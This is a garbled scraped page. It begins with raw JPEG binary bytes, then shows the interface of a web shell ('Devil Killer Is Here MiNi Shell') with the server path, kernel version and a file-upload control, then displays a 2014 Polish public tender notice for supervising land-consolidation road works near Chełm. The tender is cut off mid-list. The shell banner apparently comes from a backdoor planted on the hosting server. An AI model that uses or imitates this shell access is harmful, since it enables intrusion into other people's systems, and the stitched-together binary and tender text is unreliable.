JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140416/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140416/130478-N-2014.html

<p class="kh_header"><b>Chełm: Pełnienie nadzoru inwestorskiego nad realizacją zadania- Projekt scalenia gruntów obrębu Wólka Czułczycka i Zarzecze, gmina Chełm, powiat chełmski, województwo lubelskie</b><br>
<b>Numer ogłoszenia: 130478 - 2014; data zamieszczenia: 16.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Chełmie , Plac Niepodległości 1, 22-100 Chełm, woj. lubelskie, tel. 82 5627501, faks 82 5627510.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.powiat.chelm.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> -</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie nadzoru inwestorskiego nad realizacją zadania- Projekt scalenia gruntów obrębu Wólka Czułczycka i Zarzecze, gmina Chełm, powiat chełmski, województwo lubelskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie pełnego nadzoru inwestorskiego nad robotami branży drogowej dotyczącymi zadania pn. Projekt scalenia gruntów obrębu Wólka Czułczycka i Zarzecze, gmina Chełm, powiat chełmski, województwo lubelskie.
W trakcie realizacji zadania inwestycyjnego Wykonawca będzie sprawował funkcję nadzoru inwestorskiego w pełnym zakresie, wynikającym z art. 25 i 26 ustawy z dnia 7 lipca 1994 r. Prawo budowlane /Dz. U. z 2013 r. poz. 1409/ oraz będzie odpowiedzialny za realizację zadania i jego rozliczenie. 
Inspektor nadzoru ma nadzorować budowę codzienne od dnia przekazania placu budowy do dnia ostatecznego odbioru robót w czasie trwania prac budowlanych związanych z realizacją zadania. Na żądanie Zamawiającego Wykonawca ma obowiązek stawienia się na placu budowy w ciągu 1 godziny od telefonicznego wezwania Wykonawcy przez Zamawiającego.
Do zadań Wykonawcy w trakcie realizacji zadania należy w szczególności:
1.Prowadzenie nadzoru nad prawidłowym przebiegiem robót zgodnie z umową. 
2.Kontrola i dopilnowanie, aby wszystkie używane urządzenia i materiały posiadały stosowne świadectwa i certyfikaty wymagane przepisami i dokumentacją projektową.
3.Sprawdzenie ważności ubezpieczeń osób zatrudnionych oraz używanego sprzętu. 
4.Kontrola prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszystkie okoliczności mające znaczenie dla właściwego procesu budowlanego.
5.Rozstrzyganie wątpliwości natury technicznej powstałych w toku prowadzonych robót, a w razie potrzeby zasięganie opinii autora projektu.
6.Uczestniczenie przy prowadzeniu przez Wykonawcę robót koniecznych prób, pomiarów i sprawdzeń.
7.Egzekwowanie od Wykonawcy dodatkowych badań i pomiarów względnie przeprowadzenia badań niezależnych w przypadku wątpliwości, co do wiarygodności badań Wykonawcy.
8.Wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: wykonywania prób, wymagających odkrycia robót lub elementów zakrytych. 
9.Kontrola i odbiór robót budowlanych ulegających zakryciu lub zanikających. 
10.Zawieszenie robót budowlanych w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi bądź spowodować znaczne straty materialne.
11.Kontrola i weryfikacja wszelkich przedkładanych przez Wykonawcę dokumentów.
12.Kontrola postępu wykonywanych robót.
13.Potwierdzenie faktycznie wykonanego zakresu robót jako podstawy do wystawienia faktury  zgodnie z postanowieniami umowy zawartej między Zamawiającym i wykonawcą robót budowlanych.
14.Weryfikacja, analizowanie i zatwierdzanie do zapłaty faktur wystawionych przez Wykonawcę robót budowlanych w związku z realizacją umowy na roboty budowlane.
15.Uzgadnianie z Wykonawcą robót budowlanych rodzaju dokumentacji powykonawczej, sprawdzanie jej i zatwierdzanie w porozumieniu z Zamawiającym.
16.Uczestnictwo w komisji odbioru końcowego inwestycji oraz komisjach odbiorów gwarancyjnych, w tym prowadzenie wraz z Zamawiającym przeglądów gwarancyjnych. Zamawiający zakłada, że w okresie gwarancyjnym przynajmniej raz na rok dokonywane będą przeglądy stanu technicznego wybudowanych i przebudowanych obiektów. 
17.Zarządzanie całym procesem przekazania obiektu do użytkowania.

Zakres robót objętych nadzorem inwestorskim obejmuje:
Budowa czterech przepustów rurowych w ciągu drogi-odcinka 5-5
1 Roboty przygotowawcze: 1 d.1 Wykop i wyprofilowanie miejsca posadowienia przepustu-; 2 Przepust - 4 szt.: 2 d.2 Przepusty rurowe - ławy fundamentowe z kruszywa łamanego 0-31,5mm, 3 d.2 Przepusty rurowe - rury PEHD o średnicy 60 cm, 4 d.2 Zasypka przepustu piaskiem zagęszczanym ręcznie o grubości 20 cm, 5 d.2 Zasypanie przepustu gruntem spoistym (rodzimym) z zagęszcz. mechanicznym ubijakami, 6 d.2 Darniowanie skarp na płask bez humusu
Budowa trzech zjazdów z drogi powiatowej nr 1805L na drogi publiczne
1 Zjazd utwardzony - 3 szt.: 1 d.1 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką - koryto zjazdu, 2 d.1 Warstwa dolna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 3 d.1 Warstwa górna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 4 d.1 Nawierzchnie z tłucznia kamiennego frakcji 0-31,5 mm o gr. 5 cm; 2 Przepust - 2 szt.: 5 d.2 Wykop i wyprofilowanie rowu w miejscu posadowienia przepustu, 6 d.2 Przepusty rurowe - ławy fundamentowe z kruszywa łamanego 0-31,5mm, 7 d.2 Przepusty rurowe - rury PEHD o średnicy 50 cm, 8 d.2 Zasypka przepustu piaskiem średnioziarnistym zagęszczonym mechanicznie o gr.10 cm, 9 d.2 Darniowanie skarp na płask bez humusu

Droga-odcinek 1-1 od km 0+000,00 do km 3+424,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym; 2 Roboty drogowe: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką; 3 Nawierzchnia z płyt: 3 d.3 Warstwy odsączające zagęszczane mechanicznie o gr.20 cm - wypełnienie pomiędzy pasami płyt, 4 d.3 Ułożenie nawierzchni z płyt JOMB - pasy szer. 1 m wraz z warstwą piasku o gr. 10 cm, 5 d.3 Ułożenie nawierzchni z płyt JOMB - mijanki - wraz z warstwą piasku o gr. 10 cm, 6 d.3 Wykonanie poboczy z gruntu rodzimego z zagęszczeniem o gr. 0-30 cm (grunt dowieziony); 4 Przepust: 7 d.4 Zasypka przepustu piaskiem zagęszczanym ręcznie o grubości 20 cm, 8 d.4 Przepusty rurowe - ławy fundamentowe z kruszywa łamanego 0-31,5mm, 9 d.4 Przepusty rurowe - rury PEHD o średnicy 60 cm - 3 szt.,10 d.4 Przepusty rurowe - rury PEHD o średnicy 50 cm - 1 szt., 11 d.4 Darniowanie skarp na płask bez humusu

Droga - odcinek 2-2 od km 0+006,70 do km 0+966,50
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym; 2 Roboty drogowe: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką, 3 d.2 Oczyszczenie przepustu  z namułu do 50% jego średnicy

Droga-odcinek 3-3 od km 0+000,00 do km 0+214,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym; 2 Roboty drogowe: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką, 3 d.2 Oczyszczenie przepustu z namułu do 50% jego średnicy

Droga-odcinek 4-4 od km 0+000,00 do km 0+379,70
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym; 2 Roboty drogowe: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką; 3 Zjazd utwardzony: 3 d. 3 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką - koryto zjazdu, 4 d. 3 Warstwa dolna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 5 d. 3 Warstwa górna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 6 d. 3 Nawierzchnie z tłucznia kamiennego frakcji 0-31,5 mm - warstwa górna o gr. 5 cm; 4 Przepust: 7 d. 4	Rozebranie przepustów rurowych - rury betonowe o śr. 50 cm-3.00 m, 8 d. 4 Przepusty rurowe - ławy fundamentowe z kruszywa łamanego 0-31,5mm-1.20 m3, 9 d. 4 Przepusty rurowe - rury PEHD o średnicy 60 cm-8.00 m, 10 d. 4 Zasypka przepustu piaskiem zagęszczanym ręcznie o grubości 20 cm, 11 d. 4 Zasypanie przepustu gruntem spoistym (rodzimym) z zagęszcz. Mechanicznym ubijakami, 12 d. 4 Darniowanie skarp na płask bez humusu

Droga-odcinek 5-5 od km 0+000,00 do km 3+443,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym; 2 Wyrównanie: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką-; 3 Przepusty - 3 szt.: 3 d. 3 Rozebranie przepustów rurowych - rury betonowe o śr. 50 cm, 4 d. 3 Przepusty rurowe - ławy fundamentowe z kruszywa łamanego 0-31,5mm, 5 d. 3 Przepusty rurowe - rury PEHD o średnicy 60 cm, 6 d. 3 Zasypka przepustu piaskiem zagęszczanym ręcznie o grubości 20 cm, 7 d. 4 Zasypanie przepustu gruntem spoistym (rodzimym) z zagęszcz. mechanicznym ubijakami, 8 d. 4 Darniowanie skarp na płask bez humusu
Droga-odcinek 6-6 od km 0+000,00 do km 3+157,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym; 2 Roboty ziemne:2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką;3 Nawierzchnia: 3 d. 3 Warstwa podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 4 d. 3 Nawierzchnie z tłucznia kamiennego frakcji 0-31,5 mm o gr. 15 cm;4 Roboty wykończeniowe: 5 d. 4 Wykonanie poboczy z gruntu rodzimego z zagęszczeniem o gr. 0-30 cm (grunt dowieziony) 5 Przepusty - 8 szt.: 6 d. 5 Przepusty rurowe - ławy fundamentowe z kruszywa łamanego 0-31,5mm, 7 d. 5 Przepusty rurowe 7 szt. - rury PEHD o średnicy 60 cm,8 d. 5 Przepust rurowy 1 szt. - rury PEHD o średnicy 50 cm, 9 d. 5 Zasypka przepustu piaskiem zagęszczonym o gr. warstwy 10 cm, 10 d. 5 Darniowanie skarp na płask bez humusu
Droga-odcinek 7-7 od km 0+006,30 do km 0+518,70
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym; 2 Roboty drogowe: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką

Droga-odcinek 8-8 od km 0+000,00 do km 1+106,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym; 2 Roboty drogowe: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką; 3 Zjazd utwardzony: 3 d. 3 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką - koryto zjazdu, 4 d. 3 Warstwa dolna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 5 d. 3 Warstwa górna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 6 d. 3 Nawierzchnie z tłucznia kamiennego frakcji 0-31,5 mm - warstwa górna o gr. 5 cm; 4 Przepusty: 7 d. 4 Oczyszczenie dwóch przepustów z namułu do 50% średnicy

Droga-odcinek 9-9 od km 0+000,00 do km 0+268,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym; 2 Roboty drogowe: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką;3 Zjazd utwardzony: 3 d. 3 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką - koryto zjazdu, 4 d. 3 Warstwa dolna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 5 d. 3 Warstwa górna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 6 d. 3 Nawierzchnie z tłucznia kamiennego frakcji 0-31,5 mm - warstwa górna o gr. 5 cm;4 Przepust: 7 d. 4 Rozebranie przepustów rurowych - rury betonowe o śr. 50 cm, 8 d. 4 Przepusty rurowe - ławy fundamentowe z kruszywa łamanego 0-31,5mm, 9 d. 4 Przepusty rurowe - rury PEHD o średnicy 60 cm, 10 d. 4 Zasypka przepustu piaskiem zagęszczanym ręcznie o grubości 20 cm, 11 d. 4 Zasypanie przepustu gruntem spoistym (rodzimym) z zagęszcz. mechanicznym ubijakami, 12 d. 4 Darniowanie skarp na płask bez humusu

Droga-odcinek 10-10 od km 0+006,50 do km 0+430,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym;2 Roboty drogowe: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką, 3 d.2 Oczyszczenie przepustu z namułu do 50% jego średnicy

Droga-odcinek 11-11 od km 0+000,00 do km 1+79,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym;2 Roboty drogowe: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką;3 Zjazd utwardzony: 3 d. 3 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką - koryto zjazdu	, 
4 d. 3 Warstwa dolna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 5 d. 3 Warstwa górna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 6 d. 3 Nawierzchnie z tłucznia kamiennego frakcji 0-31,5 mm - warstwa górna o gr. 5 cm;4 Rowy odwadniające:7 d. 4	Mechaniczne 
odkrzaczanie zarośniętego rowu (krzaki gęste), ułożenie krzaków w stosy i usunięcie pozostałości

Droga-odcinek 12-12 od km 0+000,00 do km 0+860,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym;2 Roboty ziemne: 2 d.2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką wraz z wyprofilowaniem skarp rowów odwadniających;3 Nawierzchnia: 3 d. 3 Warstwa górna podbudowy z kruszyw łamanych frakcji 31,5-63,0 mm gr. 15 cm, 4 d. 3 Nawierzchnie z tłucznia kamiennego frakcji 0-31,5 mm o gr. 5 cm;4 Rowy wykończeniowe: 5 d.4 Ręczne wykonanie poboczy z gruntu rodzimego z zagęszczeniem o gr. 5 cm 

Droga-odcinek 13-13 od km 0+000,00 do km 0+952,50
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym;2 Roboty ziemne: 2 d. 2 Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0.40 m3 w gr. kat. III-IV z transp.urobku na odl. do 1 km sam. samowyład., 3 d. 2 Dodatek za każdy rozp. 1 km transportu ziemi samochodami samowyładowczymi po terenie lub drogach gruntowych (kat.gr. I-IV) Krotność = 4, 4 d. 2 Wykonanie poboczy wraz z profilowaniem skarp rowu odwadniającego z gruntu rodzimego z zagęszczeniem o gr. 0-30 cm -160 m3,3 Nawierzchnia:5 d. 3 Warstwa dolna podbudowy z kruszyw łamanych gr. 15 cm, 6 d. 3 Nawierzchnie z tłucznia kamiennego frakcji 0-31,5 mm o gr. 15 cm

Droga-odcinek 14-14 od km 0+000,00 do km 0+860,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym. 2 Roboty ziemne: 2 d. 2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką, 3 Nawierzchnia: 3 d. 3 Warstwa z kruszyw łamanych frakcji 0-63mm gr.20 cm, 4Roboty wykończeniowe: 4 d. 4 Mechaniczne wykonanie poboczy z gruntu rodzimego z zagęszczeniem o gr. 0-20 cm - 47,00 m3

Droga-odcinek 15-15 od km 0+000,00 do km 0+273,00
1 Roboty przygotowawcze: 1 d.1 Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym, 2 Roboty ziemne: 2 d. 2 Mechaniczne plantowanie powierzchni gruntu rodzimego równiarką.
Roboty towarzyszące: wykonanie inwentaryzacji geodezyjnej powykonawczej.
Szczegółowy zakres robót i warunki realizacji określa dokumentacja techniczna, tj. w szczególności:
1.Projekt budowlano- wykonawczy.
2.Przedmiar robót.
3.Szczegółowa specyfikacja techniczna wykonania i odbioru robót.

Zadanie realizowane jest w ramach działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów objętego Programem Rozwoju Obszarów Wiejskich 2007-2013..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia Wykonawca winien wykazać wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywane główne usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie. Warunek będzie spełniony, gdy Wykonawca dowiedzie, że wśród wykazanych usług znajduje się co najmniej 1 usługa polegająca na nadzorze inwestorskim nad robotami branży drogowej w zakresie budowy lub przebudowy dróg o nawierzchni z kruszywa łamanego w zakresie nie mniejszym niż 10 tys. m2 oraz co najmniej 1 usługa polegająca na nadzorze inwestorskim nad robotami branży drogowej w zakresie budowy lub przebudowy dróg o nawierzchni z płyt betonowych w zakresie nie mniejszym niż 5 tys. m2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca winien wykazać dysponowanie osobami: 1 osobą do pełnienia funkcji Inspektora nadzoru branży drogowej posiadającą ważne uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej oraz min. 36 miesięczny staż pracy na stanowisku inspektora nadzoru nad robotami branży drogowej. Uprawnienia budowlane powinny być wydane zgodnie z ustawą z dnia 7 lipca 1994 r. Prawo budowlane. W przypadku nabycia uprawnień w innym kraju niż Polska będą także uznawane kwalifikacje zawodowe nabyte w państwach członkowskich Unii Europejskiej oraz państwach Europejskiego Obszaru Gospodarczego (European Economic Area- EEA) i Konfederacji Szwajcarskiej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

